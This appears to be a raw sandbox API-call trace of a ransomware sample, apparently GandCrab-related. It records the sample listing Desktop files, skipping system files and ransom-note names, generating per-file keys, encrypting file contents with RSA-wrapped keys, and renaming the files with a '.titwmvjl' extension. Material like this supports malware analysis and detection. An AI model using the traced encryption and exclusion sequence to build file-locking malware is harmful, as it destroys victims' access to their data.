lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="ntldr") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="NTDETECT.COM") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="Bootfont.bin") returned -1 [0087.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned 52 [0087.458] lstrlenW (lpString=".rtf") returned 4 [0087.458] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.458] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".rtf ") returned 5 [0087.458] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.458] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.458] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\51lawaqjiavos044fk.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.459] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.459] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.460] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.461] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.461] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.461] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.461] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.461] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.462] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.463] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.463] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.463] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.463] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.463] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.463] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.464] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.465] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503838) returned 1 [0087.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.465] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.465] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.465] GetLastError () returned 0x0 [0087.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.465] CryptDestroyKey (hKey=0x503838) returned 1 [0087.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.466] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.466] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.467] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0087.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.467] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.468] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.468] GetLastError () returned 0x0 [0087.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.468] CryptDestroyKey (hKey=0x5038f8) returned 1 [0087.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.468] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.468] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.468] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.469] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x182b3, lpOverlapped=0x0) returned 1 [0087.482] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffe7d4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.482] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x182b3, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x182b3, lpOverlapped=0x0) returned 1 [0087.483] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.485] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.488] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.489] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.489] CloseHandle (hObject=0x2ac) returned 1 [0087.490] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\51lawaqjiavos044fk.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\51lawaqjiavos044fk.rtf.titwmvjl"), dwFlags=0x1) returned 1 [0087.490] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.490] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.490] lstrcmpW (lpString1="A-RD78l7Qlc9J.bmp", lpString2=".") returned 1 [0087.490] lstrcmpW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="..") returned 1 [0087.490] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="A-RD78l7Qlc9J.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp" [0087.490] lstrlenW (lpString=".titwmvjl") returned 9 [0087.490] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned 47 [0087.490] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.491] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp.titwmvjl") returned 56 [0087.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned 47 [0087.493] lstrlenW (lpString=".bmp") returned 4 [0087.493] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.493] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0087.493] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0087.493] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned 47 [0087.493] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned 47 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="desktop.ini") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="autorun.inf") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="ntuser.dat") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="iconcache.db") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="bootsect.bak") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="boot.ini") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="ntuser.dat.log") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="thumbs.db") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="CRAB-DECRYPT.html") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.493] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="ntldr") returned -1 [0087.494] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="NTDETECT.COM") returned -1 [0087.494] lstrcmpiW (lpString1="A-RD78l7Qlc9J.bmp", lpString2="Bootfont.bin") returned -1 [0087.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp") returned 47 [0087.494] lstrlenW (lpString=".bmp") returned 4 [0087.494] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.494] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0087.494] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.494] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.494] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-rd78l7qlc9j.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.494] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.494] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.495] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.495] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.496] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.497] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.497] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.497] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.497] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.497] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.497] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.497] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.498] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.499] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.499] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.499] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.499] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.499] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.499] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.501] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0087.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.501] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.501] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.501] GetLastError () returned 0x0 [0087.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.502] CryptDestroyKey (hKey=0x5032f8) returned 1 [0087.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.502] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.502] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.503] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0087.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.503] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.504] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.504] GetLastError () returned 0x0 [0087.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.504] CryptDestroyKey (hKey=0x5038f8) returned 1 [0087.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.504] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.504] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.504] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.504] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x266d, lpOverlapped=0x0) returned 1 [0087.516] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffd993, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.516] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x266d, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x266d, lpOverlapped=0x0) returned 1 [0087.517] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.517] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.519] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.522] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.522] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.522] CloseHandle (hObject=0x2ac) returned 1 [0087.523] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-rd78l7qlc9j.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-RD78l7Qlc9J.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-rd78l7qlc9j.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0087.523] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.524] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.524] lstrcmpW (lpString1="a0bCx0.mp3", lpString2=".") returned 1 [0087.524] lstrcmpW (lpString1="a0bCx0.mp3", lpString2="..") returned 1 [0087.524] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="a0bCx0.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3" [0087.524] lstrlenW (lpString=".titwmvjl") returned 9 [0087.524] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned 40 [0087.524] VirtualAlloc (lpAddress=0x0, dwSize=0x90, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.524] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3.titwmvjl") returned 49 [0087.524] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned 40 [0087.524] lstrlenW (lpString=".mp3") returned 4 [0087.524] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.524] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0087.524] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0087.524] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned 40 [0087.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned 40 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="desktop.ini") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="autorun.inf") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="ntuser.dat") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="iconcache.db") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="bootsect.bak") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="boot.ini") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="ntuser.dat.log") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="thumbs.db") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="ntldr") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="NTDETECT.COM") returned -1 [0087.525] lstrcmpiW (lpString1="a0bCx0.mp3", lpString2="Bootfont.bin") returned -1 [0087.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3") returned 40 [0087.525] lstrlenW (lpString=".mp3") returned 4 [0087.525] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.525] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0087.525] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.525] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.526] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\a0bCx0.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a0bcx0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.526] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.526] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.527] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.527] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.528] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.528] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.528] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.528] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.529] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.529] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.529] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.530] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 